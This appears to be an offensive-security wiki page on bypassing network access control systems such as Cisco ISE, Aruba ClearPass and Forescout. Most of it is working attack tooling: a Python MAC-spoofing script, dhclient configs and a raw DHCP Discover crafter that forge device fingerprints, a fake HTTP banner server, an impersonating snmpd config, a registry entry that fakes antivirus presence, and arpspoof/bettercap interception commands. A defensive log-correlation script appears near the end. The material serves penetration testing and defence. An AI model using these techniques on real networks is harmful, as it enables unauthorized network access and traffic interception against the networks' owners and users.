NAC Bypass
#Overview
Network Access Control (NAC) systems enforce security policy at the network edge by authenticating, authorizing, and evaluating devices before granting network access. Common NAC implementations include Cisco ISE (Identity Services Engine), Aruba ClearPass, Forescout, and PacketFence. Despite their sophistication, NAC systems have well-documented bypass techniques that exploit device profiling weaknesses, MAC authentication bypass (MAB), and posture assessment gaps.
#NAC Architecture
Device ──802.1X/EAP or MAB──► Switch ──RADIUS──► NAC Server (ISE/ClearPass/Forescout)
                                                           ↕ LDAP/Kerberos
                                                Identity Store (AD/LDAP)
#NAC Enforcement Points
| Enforcement Type | Mechanism | Bypass Difficulty |
|---|---|---|
| 802.1X (certificate) | EAP-TLS with device cert | Hard |
| 802.1X (credentials) | PEAP/EAP-TTLS | Medium (see 802.1X Attacks) |
| MAB (MAC Auth Bypass) | MAC address as identity | Easy |
| Posture assessment | Agent or agentless health check | Medium |
| Web auth (captive portal) | Browser-based login | Easy |
| Device profiling | DHCP/HTTP/SNMP fingerprinting | Medium |
#Method 1: MAC Authentication Bypass (MAB) Spoofing
MAB is the weakest NAC enforcement: the switch sends the endpoint's MAC address to the RADIUS server as both username and password, so the MAC is the entire identity. Spoofing a MAC the NAC already knows grants whatever access that endpoint's policy assigns, which for printers and phones is often an unrestricted production VLAN.
#Identifying MAB-Protected Networks
# NAC systems using MAB typically:
# 1. Let the port pass traffic without any EAP exchange (or after the EAP requests time out)
# 2. Assign devices to a quarantine/guest VLAN initially
# 3. Move devices to the correct VLAN once the MAC lookup succeeds
# Connect and check what you were given
ip addr show eth0
# A small, separate range (guest/quarantine VLANs are often numbered like 999, 4094, 100)
# suggests you landed in a MAB or guest holding VLAN
# Watch the DHCP exchange itself: a short lease time on the offer is a common quarantine indicator,
# and the options your own client sends (55 parameter request list, 60 vendor class, 77 user class,
# 12 hostname) are exactly what the profiler fingerprints (see Device Profiling Spoofing below)
sudo tcpdump -i eth0 -vvv -n 'udp port 67 or udp port 68'
#MAB Spoofing Strategy
# 1. Discover allowed MAC addresses
# See [MAC Filtering Bypass](mac-filtering-bypass.md) for detailed MAC discovery
# 2. Choose the right device type to spoof
# Printers and IoT devices are often whitelisted with minimal profiling
# Common targets:
# - HP printers (OUI: 00:1A:4B, 00:17:A4, 00:1E:0B)
# - Cisco phones (OUI: 00:00:0C, 00:03:E3, 00:06:28)
# - Polycom phones (OUI: 00:04:F2, 00:07:53, 00:0E:7E)
# - IoT sensors (various)
# 3. Spoof the MAC (note the current address from /sys/class/net/eth0/address first so you can restore it)
sudo dhclient -r eth0                      # release any lease still bound to your real MAC
sudo ip link set dev eth0 down
sudo ip link set dev eth0 address <TARGET_MAC>
sudo ip link set dev eth0 up
# 4. Request DHCP
sudo dhclient -1 eth0
# 5. Verify access: you should now be in the VLAN the spoofed device belongs to
ip addr show eth0
ping -c 3 <target_ip>
# Caveat: if the real device is still connected, the switch now sees the same MAC on two ports.
# Port security or a MAC-move violation can err-disable the port, and the NAC logs the duplicate.
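The five steps above as one script, added here as an example and not code from the original page: it vets the candidate MAC (multicast bit, locally administered bit, OUI against the vendors listed above) before touching the interface, and runs the `ip`/`dhclient` commands from steps 3 and 4 only when told to. The interface name, the example MACs and the OUI-to-vendor labels are assumptions for illustration; the OUIs themselves are the ones in the target list above.

```python
#!/usr/bin/env python3
"""mab_spoof.py: vet a MAC for MAB spoofing, then apply steps 3-4 (added example).

Assumptions: Linux with iproute2 and ISC dhclient; interface name and MACs are
illustrative. The OUI table is the list from the page above, nothing more.
"""
import argparse
import re
import subprocess

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}$")

# OUIs from the target list above (lower-case, colon form). Anything else is "unknown".
KNOWN_OUIS = {
    "00:1a:4b": "HP printer", "00:17:a4": "HP printer", "00:1e:0b": "HP printer",
    "00:00:0c": "Cisco", "00:03:e3": "Cisco", "00:06:28": "Cisco",
    "00:04:f2": "Polycom", "00:07:53": "Polycom", "00:0e:7e": "Polycom",
}


def normalize_mac(mac: str) -> str:
    """Accept AA-BB-CC-DD-EE-FF or aa:bb:..., return lower-case colon form."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac.lower().replace("-", ":")


def oui_vendor(mac: str) -> str:
    return KNOWN_OUIS.get(normalize_mac(mac)[:8], "unknown")


def candidate_problems(mac: str) -> list:
    """Reasons a MAC is a poor MAB candidate, decided from its first octet alone.

    bit 0 (I/G) set -> multicast: never valid as a source address.
    bit 1 (U/L) set -> locally administered: carries no vendor OUI, which is what
                       profilers use to flag randomised or spoofed addresses.
                       `macchanger -r` produces exactly these.
    """
    first = int(normalize_mac(mac)[:2], 16)
    problems = []
    if first & 0x01:
        problems.append("multicast (I/G) bit set")
    if first & 0x02:
        problems.append("locally administered (U/L) bit set; no vendor OUI")
    return problems


def current_mac(iface: str) -> str:
    """Read the live address (Linux sysfs) so you can restore it afterwards."""
    with open(f"/sys/class/net/{iface}/address") as f:
        return f.read().strip()


def plan(iface: str, mac: str) -> list:
    """Commands for steps 3 and 4 above, in order. Releasing the old lease first
    avoids leaving a lease bound to the real MAC in the server's table."""
    m = normalize_mac(mac)
    return [
        ["dhclient", "-r", iface],
        ["ip", "link", "set", "dev", iface, "down"],
        ["ip", "link", "set", "dev", iface, "address", m],
        ["ip", "link", "set", "dev", iface, "up"],
        ["dhclient", "-1", iface],
    ]


def spoof(iface: str, mac: str, dry_run: bool = True) -> list:
    """Refuse obviously bad candidates, then print or run the plan (root needed to run)."""
    problems = candidate_problems(mac)
    if problems:
        raise ValueError("; ".join(problems))
    cmds = plan(iface, mac)
    for argv in cmds:
        if dry_run:
            print("would run:", " ".join(argv))
        else:
            subprocess.run(argv, check=True)
    return cmds


if __name__ == "__main__":
    ap = argparse.ArgumentParser()
    ap.add_argument("iface")
    ap.add_argument("mac", help="MAC of an endpoint the NAC already allows")
    ap.add_argument("--run", action="store_true", help="apply instead of printing")
    a = ap.parse_args()
    print(f"{a.mac}: vendor={oui_vendor(a.mac)}, original address={current_mac(a.iface)}")
    spoof(a.iface, a.mac, dry_run=not a.run)
```

`python3 mab_spoof.py eth0 00:1a:4b:12:34:56` prints the plan; add `--run` as root to apply it. The U/L check is the point of the script: a randomly generated MAC has that bit set and no registered OUI, which is the first thing a profiler flags, so always take the address from a real, allowed device.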
#Device Profiling Spoofing
NAC systems fingerprint devices using DHCP, HTTP, and SNMP probes. To bypass profiling, mimic the device type you're spoofing.
# DHCP fingerprint spoofing
# dhclient.conf controls what your client sends: `send` sets an option value (60, 61, 12, ...),
# `request` sets the parameter request list (option 55) in the order listed, which is the
# fingerprint profilers match on. The keywords are `send` and `request`, not `option`;
# `option NAME code N = ...` only declares an option name dhclient does not know yet.
# Stop NetworkManager/dhcpcd first, or they send their own Linux-looking Discover alongside yours.
# Example: spoof a Windows workstation (vendor class "MSFT 5.0", client-id 01+MAC, hostname, Windows option 55 order)
cat > /etc/dhcp/dhclient.conf << 'EOF'
option rfc3442-classless-static-routes code 121 = array of unsigned integer 8;
option ms-classless-static-routes code 249 = array of unsigned integer 8;
option wpad code 252 = text;
send vendor-class-identifier "MSFT 5.0";
send dhcp-client-identifier 01:<MAC_IN_HEX>;
send host-name "<WINDOWS_STYLE_HOSTNAME>";
# Windows does not send option 77 (user-class) by default; adding one breaks the fingerprint
request subnet-mask, routers, domain-name-servers, domain-name, perform-mask-discovery,
        static-routes, vendor-encapsulated-options, netbios-name-servers, netbios-node-type,
        netbios-scope, domain-search, rfc3442-classless-static-routes,
        ms-classless-static-routes, wpad;
EOF
sudo dhclient -1 -cf /etc/dhcp/dhclient.conf eth0
# Example: spoof a Cisco IP phone (the option 60 string a 79xx phone sends; phones name themselves
# SEP<MAC> and ask for their TFTP server via options 66/150, they do not send tftp-server-name)
cat > /etc/dhcp/dhclient.conf << 'EOF'
option tftp-server-address code 150 = array of ip-address;
send vendor-class-identifier "Cisco Systems, Inc. IP Phone CP-7960G";
send host-name "SEP<MAC_IN_HEX_NO_COLONS>";
request subnet-mask, routers, domain-name-servers, domain-name, tftp-server-name, tftp-server-address;
EOF
sudo dhclient -1 -cf /etc/dhcp/dhclient.conf eth0
# Caveat: ISE and ClearPass profile Cisco phones mainly from the CDP/LLDP-MED data the switch reports,
# and the voice VLAN is normally assigned only to a device that speaks CDP/LLDP-MED. A DHCP-only
# phone impersonation usually lands in the data VLAN with a low-confidence profile.
#HTTP Fingerprint Spoofing
NAC systems may probe the device with HTTP requests, and some (ISE's HTTP probe) fingerprint the User-Agent of HTTP traffic the device sends rather than what it serves. Cover both: serve a banner that matches the device, and only make outbound HTTP requests with a matching User-Agent.
# Set up a fake HTTP server that responds with the target device's profile (port 80 needs root)
sudo python3 << 'EOF'
from http.server import HTTPServer, BaseHTTPRequestHandler

class NACHandler(BaseHTTPRequestHandler):
    # The Server: header is the first thing a banner grab sees; replace the
    # Python default ("BaseHTTP/... Python/...") with the string the real device uses
    server_version = "<TARGET_DEVICE_SERVER_HEADER>"
    sys_version = ""

    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            # Respond with a page that matches the device profile
            self.wfile.write(b"<html><body>HP LaserJet Pro MFP</body></html>")
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):
        pass  # keep probe requests off the terminal

HTTPServer(("0.0.0.0", 80), NACHandler).serve_forever()
EOF
#Method 2: Posture Assessment Bypass
Posture assessment checks device health (antivirus, firewall, OS patches, disk encryption) before granting network access.
#Agent-Based Posture Bypass
# Cisco ISE with the AnyConnect posture module (now Cisco Secure Client)
# The agent runs the posture checks on the endpoint and reports the result to ISE
# Bypass options:
# 1. Spoof the posture agent report
# Requires code execution on an endpoint that runs the agent
# Locate the posture agent files and cache on a compliant device
# Windows: C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\
# 2. Use a pre-configured VM image that genuinely passes
# Build a VM with compliant posture (supported AV, patched, disk encrypted, firewall on) and bridge it to the port
# 3. Time-based bypass
# ISE holds an endpoint in a limited "posture pending" state until assessment completes, and the
# remediation timer that bounds this state is configurable and often generous
# Connect and do your enumeration before the grace period expires; after it the session is moved or dropped
#Agentless Posture Bypass
# Agentless posture uses network probes (HTTP, SNMP, WMI/SMB against Windows hosts)
# to assess device health
# Bypass: Respond to probes with compliant data
# 1. HTTP redirect probe
# NAC redirects HTTP traffic to a posture portal
# Bypass: Use HTTPS/DNS tunneling before the posture check
# See [Captive Portal Bypass](../wifi-attacks/captive-portal-bypass.md)
# 2. SNMP probe
# NAC queries SNMP for device information; profilers key on sysDescr and sysObjectID,
# so set those to the target device's values (copy them from a real unit with snmpget),
# then start snmpd. Note that snmpd -c takes a config FILE, not a community string.
cat > /etc/snmp/snmpd.conf << 'EOF'
sysdescr "<SYSDESCR_OF_TARGET_DEVICE>"
sysobjectid <SYSOBJECTID_OF_TARGET_DEVICE>
syscontact "IT Support <it@company.com>"
syslocation "Office"
sysServices 72
rocommunity public
agentaddress udp:161
EOF
sudo snmpd -c /etc/snmp/snmpd.conf -Ls 4 -p /var/run/snmpd.pid
# Check with snmpget against 127.0.0.1 that sysDescr.0 and sysObjectID.0 come back as intended
# 3. Registry/WMI probe (Windows)
# Agentless checks of a Windows host run over WMI/SMB with a privileged domain account. AV status is
# normally read from Windows Security Center (WMI namespace root\SecurityCenter2, class AntiVirusProduct),
# patch level from the update history; product-specific checks read that product's own registry keys.
# The entry below only satisfies a check that looks for this exact key; it does nothing for a check
# that queries SecurityCenter2. Confirm which check the policy uses before relying on it:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YourAV" /v "InstallDate" /t REG_SZ /d "20250101" /f
#Method 3: NAC Bypass via VPN/VLAN Misconfiguration
Many NAC deployments carve out exceptions, and each exception is a path around enforcement.
#Common Misconfigurations
# 1. VPN bypass
# Remote-access VPN users often get an internal address with no posture or profiling at all,
# or under a weaker policy than the wired edge enforces
# Connect to the VPN from outside (a non-NAC-enforced network) with any valid credentials
sudo openvpn config.ovpn
# 2. Management VLAN access
# Switch management interfaces may sit on a VLAN that is reachable from the quarantine VLAN
# and is itself exempt from NAC
nmap -sn <management_subnet>
# 3. Printer/IoT VLAN
# These VLANs often carry relaxed NAC policy (MAB only, no posture)
# Spoof a printer MAC to be placed on the printer VLAN
# See MAB spoofing above
# 4. Guest VLAN pivot
# The guest VLAN may reach internal resources that are not properly segmented
nmap -sn <guest_vlan_subnet>
nmap -sV -p 80,443,22,3389 <target_from_guest>
#ARP Spoofing for NAC Circumvention
# After landing on a quarantine/guest VLAN that also holds already-authenticated hosts
# (enforcement is per port; nothing stops layer-2 traffic between hosts on the same VLAN),
# ARP spoof to put yourself between such a host and the gateway and work from its traffic
# Enable IP forwarding so the victim's traffic keeps flowing through you
sudo sysctl -w net.ipv4.ip_forward=1
# ARP spoof both directions (two terminals)
sudo arpspoof -i eth0 -t <target_ip> <gateway_ip>
sudo arpspoof -i eth0 -t <gateway_ip> <target_ip>
# Or use bettercap
sudo bettercap -iface eth0
> net.probe on
> set arp.spoof.targets <target_ip>
> arp.spoof on
> net.sniff on
# Caveat: this gives you the victim's traffic, not its VLAN or authorization. If the holding VLAN is
# isolated at the switch (private VLAN / protected ports) there is nobody to spoof.
#Method 4: Specific NAC Vendor Bypasses
#Cisco ISE
# Cisco ISE profiling bypass techniques:
# 1. Profiling delay exploitation
# ISE profiles an endpoint from the probes it collects (RADIUS with CDP/LLDP attributes, DHCP, HTTP,
# SNMP, NMAP), which takes on the order of 30-60 seconds after connection
# Until then the endpoint matches only a generic/unknown profile, and some authorization policies
# grant that state broader access than the final profile would
# Connect, enumerate, and establish persistence before profiling completes
# 2. Endpoint identity group spoofing
# Spoof a MAC from a group with a permissive authorization rule
# Common groups: "Guest", "BYOD", "Printers", "Cameras"
# 3. Stale endpoint entries
# If the endpoint database is never purged, a MAC from a decommissioned device keeps its profile
# and any statically assigned group, and nobody else will contend for the address
# 4. DHCP option 55 (Parameter Request List) spoofing
# Different OSes request different DHCP options, in a characteristic order;
# ISE's DHCP probe matches the list against its profiler feed
# Spoof the DHCP fingerprint of a compliant device type
# Windows fingerprint
# Option 55: 1,3,6,15,31,33,43,44,46,47,119,121,249,252
# Linux fingerprint
# Option 55: 1,28,3,6,12,15,17,23,28,33,40,41,42,43,44,46,47
# macOS fingerprint
# Option 55: 1,3,6,15,25,26,28,41,42,119,121,249
# Lists change between OS versions: confirm one by capturing a Discover from the real device type
# (tcpdump -vvv 'udp port 67') or by looking it up in Fingerbank, the database PacketFence uses
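The dhclient.conf examples in the Device Profiling Spoofing section and the option 55 lists above both come down to which bytes the Discover carries. The script below is an added example, not part of the original page or of any vendor tool: it builds a DHCP Discover by hand with a chosen chaddr, client-id, hostname, vendor class and option 55 order, then parses it back the way a DHCP profiler would, so the fingerprint can be confirmed before it is sent. The Windows and macOS option 55 lists are copied from above; the Cisco-phone list, the hostnames and the MAC are illustrative assumptions. Sending needs root and a link-layer MAC already set to match chaddr (Method 1), because the kernel supplies the Ethernet source address.

```python
#!/usr/bin/env python3
"""dhcp_fingerprint.py: craft a DHCP Discover with a chosen fingerprint and read it
back (added example, not from the page). Profilers fingerprint the client's own
Discover/Request: option 55 order, option 60, option 12 and option 61.
"""
import random
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"          # DHCP magic cookie that starts the options field

PROFILES = {
    # option 55 lists as quoted on the page; verify against a capture before use
    "windows": dict(vendor=b"MSFT 5.0", host=b"DESKTOP-7K3Q2R1",
                    prl=[1, 3, 6, 15, 31, 33, 43, 44, 46, 47, 119, 121, 249, 252]),
    "macos": dict(vendor=b"", host=b"Johns-MacBook-Pro",
                  prl=[1, 3, 6, 15, 25, 26, 28, 41, 42, 119, 121, 249]),
    # assumption: a 79xx phone asking for the TFTP options (66/150) it boots from
    "cisco-phone": dict(vendor=b"Cisco Systems, Inc. IP Phone CP-7960G",
                        host=b"SEP001122334455", prl=[1, 3, 6, 15, 42, 66, 150]),
}


def tlv(code, value):
    """One DHCP option: code, length, value."""
    assert len(value) < 256
    return bytes([code, len(value)]) + value


def build_discover(mac, profile, xid=None):
    hw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    p = PROFILES[profile]
    xid = random.getrandbits(32) if xid is None else xid
    # Fixed 236-byte BOOTP header: op=1 (request), htype=1 (Ethernet), hlen=6,
    # flags=0x8000 asks for a broadcast reply, chaddr carries the (spoofed) MAC.
    hdr = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                      1, 1, 6, 0, xid, 0, 0x8000,
                      b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                      hw.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    opts = MAGIC
    opts += tlv(53, b"\x01")              # message type: DHCPDISCOVER
    opts += tlv(61, b"\x01" + hw)         # client-id: type 1 + MAC, as Windows sends it
    opts += tlv(12, p["host"])            # hostname
    if p["vendor"]:
        opts += tlv(60, p["vendor"])      # vendor class identifier
    opts += tlv(55, bytes(p["prl"]))      # parameter request list: the fingerprint itself
    opts += b"\xff"                       # end option
    return hdr + opts


def parse_options(pkt):
    """Walk the options field into {code: raw value}; stops at the end option."""
    if pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP packet (bad magic cookie)")
    out, i = {}, 240
    while i < len(pkt):
        code = pkt[i]
        if code == 255:
            break
        if code == 0:                     # pad
            i += 1
            continue
        ln = pkt[i + 1]
        out[code] = pkt[i + 2:i + 2 + ln]
        i += 2 + ln
    return out


def fingerprint(pkt):
    """What a DHCP profiler extracts: the PRL as a comma list plus the identity options."""
    o = parse_options(pkt)
    return {
        "chaddr": ":".join(f"{b:02x}" for b in pkt[28:34]),
        "prl": ",".join(str(b) for b in o.get(55, b"")),
        "vendor_class": o.get(60, b"").decode("ascii", "replace"),
        "hostname": o.get(12, b"").decode("ascii", "replace"),
        "client_id": o.get(61, b"").hex(),
    }


def send_discover(iface, pkt):
    """Broadcast the Discover from UDP/68 on one interface (root). The kernel fills in
    the Ethernet source, so spoof the interface MAC first or it will disagree with chaddr."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, iface.encode())
    s.bind(("0.0.0.0", 68))
    s.sendto(pkt, ("255.255.255.255", 67))
    s.close()


if __name__ == "__main__":
    pkt = build_discover("00:1a:4b:12:34:56", "windows")
    print(fingerprint(pkt))               # inspect before you send
```

Run it once without sending and compare the printed `prl` string with the fingerprint you captured from a real device; a profiler compares that exact ordered list, so a single option out of place is a different fingerprint.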
#Aruba ClearPass
# ClearPass profiling bypass techniques:
# 1. Device category spoofing
# ClearPass categorizes devices by type
# Spoof a device in a permissive category (IoT, printer, VoIP)
# 2. ClearPass OnGuard bypass
# OnGuard is the posture agent for ClearPass
# Bypass by running in a VM with compliant posture
# Or by spoofing the OnGuard health report
# 3. ClearPass Guest bypass
# Guest accounts may have broader access than intended
# Create a guest account and test lateral access
#Forescout
# Forescout (CounterACT) bypass techniques:
# 1. Agentless assessment bypass
# Forescout uses network probes for agentless assessment
# Ensure your device responds to probes with compliant data
# (See HTTP/SNMP fingerprint spoofing above)
# 2. Forescout eyeInspect (vulnerability scan)
# May detect known vulnerabilities on your device
# Use a patched, compliant OS for initial access
# 3. Forescout compliance check
# Checks: AV installed, OS patched, disk encrypted, firewall enabled
# Ensure all checks pass before connecting
#Method 5: 802.1X to MAB Failover Exploitation
Cisco switches are commonly configured with `authentication order dot1x mab` and `authentication event fail action next-method`, so a port falls back to MAB when the supplicant fails or never answers. The fallback itself is routine (it is how printers get on); the weakness is a MAB authorization result that is as permissive as an 802.1X one.
# Attack: trigger an 802.1X failure or timeout to force MAB failover
# 1. Connect with no supplicant (timeout path) or with a supplicant presenting bad credentials (failure path)
# 2. After the EAP retries expire the switch tries MAB with your source MAC
# 3. Present a MAC the NAC already allows (see MAB spoofing above) so the MAB lookup succeeds
# 4. Gain whatever access the MAB rule grants
# This works because:
# - The MAB authorization rule may grant more access than intended
# - MAB is inherently weaker than 802.1X
# - The failover may assign the device to a less restrictive VLAN, or to an auth-fail/guest VLAN that is poorly segmented
# How to tell whether MAB failover is in play:
# From the port: with no supplicant, a DHCP lease arrives after roughly the EAP timeout (tens of seconds),
#                neither immediately nor never
# Cisco ISE: the authentication report shows an 802.1X failure followed by a MAB success for the same endpoint;
#            the authorization policy row the MAB session matches is the one to scrutinise
# Aruba ClearPass: a service with both 802.1X and MAC authentication enabled whose role mapping
#                  lands MAC-authenticated devices in a broad role
#Common Pitfalls
- Profiling delay: NAC systems don't profile instantly. You may have a 30–60 second window before your device is classified.
- Quarantine VLAN: Initial access is typically on a quarantine VLAN with limited connectivity. Use this window to establish a foothold.
- Periodic re-profiling: NAC re-profiles devices periodically. Your spoofed identity must remain consistent.
- MAC aging: If the original device's MAC entry ages out, your spoofed MAC may also be removed.
- Agent requirements: Some NAC deployments require a persistent agent that continuously monitors posture. This is harder to bypass.
#OPSEC Considerations
- MAB spoofing creates duplicate MAC events that NAC systems log
- Device profiling captures DHCP fingerprints, HTTP user-agents, and SNMP data
- Quarantine VLAN access is monitored and may trigger alerts
- NAC systems log authentication failures, including 802.1X and MAB attempts
- VPN connections create audit logs in the NAC system
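The detection side of Method 5 and of the duplicate-MAC point in the list above, as an added example that is not drawn from the page or from any vendor: two correlation rules run over authentication log lines. The log format is constructed for the example (one key=value event per line); ISE and ClearPass exports differ, so only parse_line would change. Rule one flags an 802.1X failure followed by a MAB pass for the same MAC on the same port within a window; rule two flags a MAC that passes authentication on two different ports within an hour, which is what MAB spoofing looks like while the real device is still plugged in.

```python
#!/usr/bin/env python3
"""nac_log_correlate.py: find dot1x-to-MAB failover and duplicate-MAC events in NAC
authentication logs (added example). Log lines and their format are constructed here."""
from datetime import datetime, timedelta

# Constructed sample: a MAB failover on Gi1/0/7, then the same printer MAC appears on
# Gi1/0/22 half an hour later. The Gi1/0/3 phone fails dot1x and only passes MAB four
# hours later, outside the default failover window.
SAMPLE_LOG = """\
2025-03-04T09:12:01Z port=Gi1/0/7 mac=00:1a:4b:12:34:56 method=dot1x result=fail reason=eap-timeout
2025-03-04T09:12:31Z port=Gi1/0/7 mac=00:1a:4b:12:34:56 method=mab result=pass profile=HP-Printer
2025-03-04T09:40:12Z port=Gi1/0/22 mac=00:1a:4b:12:34:56 method=mab result=pass profile=HP-Printer
2025-03-04T10:00:00Z port=Gi1/0/3 mac=00:04:f2:aa:bb:cc method=dot1x result=pass
2025-03-04T10:05:00Z port=Gi1/0/3 mac=00:04:f2:aa:bb:cc method=dot1x result=fail reason=bad-password
2025-03-04T14:05:00Z port=Gi1/0/3 mac=00:04:f2:aa:bb:cc method=mab result=pass profile=Polycom-Phone
"""


def parse_line(line):
    """'<ISO timestamp> key=value ...' -> dict with a datetime under 'ts'."""
    ts, rest = line.split(" ", 1)
    ev = dict(kv.split("=", 1) for kv in rest.split())
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def find_failover(events, window=timedelta(minutes=5)):
    """dot1x failure followed by a MAB pass for the same MAC on the same port within `window`."""
    alerts, last_fail = [], {}
    for ev in events:
        key = (ev["port"], ev["mac"])
        if ev["method"] == "dot1x" and ev["result"] == "fail":
            last_fail[key] = ev
        elif ev["method"] == "mab" and ev["result"] == "pass":
            fail = last_fail.pop(key, None)
            if fail and ev["ts"] - fail["ts"] <= window:
                alerts.append({"rule": "dot1x-to-mab-failover", "port": ev["port"],
                               "mac": ev["mac"], "profile": ev.get("profile", ""),
                               "delay_s": int((ev["ts"] - fail["ts"]).total_seconds())})
    return alerts


def find_duplicate_mac(events, window=timedelta(hours=1)):
    """Same MAC passing authentication on two different ports within `window`.
    A printer does not move by itself; this is the trace MAB spoofing leaves."""
    alerts, last_pass = [], {}
    for ev in events:
        if ev["result"] != "pass":
            continue
        prev = last_pass.get(ev["mac"])
        if prev and prev["port"] != ev["port"] and ev["ts"] - prev["ts"] <= window:
            alerts.append({"rule": "duplicate-mac", "mac": ev["mac"],
                           "ports": [prev["port"], ev["port"]]})
        last_pass[ev["mac"]] = ev
    return alerts


def analyse(log_text):
    """Parse, sort by time (exports are not always ordered), run both rules."""
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    return find_failover(events) + find_duplicate_mac(events)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The failover window is deliberately short: a phone that fails 802.1X in the morning and is reprovisioned onto MAB in the afternoon is an administrator at work, while a pass thirty seconds after the failure is the switch's `next-method` fallback. Tune the duplicate-MAC window to how long your NAC keeps a session alive after link-down.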
#Cross-References
- MAC Filtering Bypass — The foundation for MAB bypass
- 802.1X Attacks — 802.1X authentication exploitation
- VLAN Hopping — Network segmentation bypass after NAC bypass
- Captive Portal Bypass — Web authentication bypass
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| macchanger | MAC spoofing | https://github.com/alxchk/macchanger |
| dhclient | DHCP fingerprint spoofing | ISC DHCP client (isc-dhcp-client) |
| snmpd | SNMP response spoofing | Net-SNMP, http://www.net-snmp.org/ |
| bettercap | ARP spoofing and MITM | https://www.bettercap.org/ |
| arpspoof | ARP spoofing | dsniff suite |
| tcpdump | Capture the DHCP exchange to verify a fingerprint | https://www.tcpdump.org/ |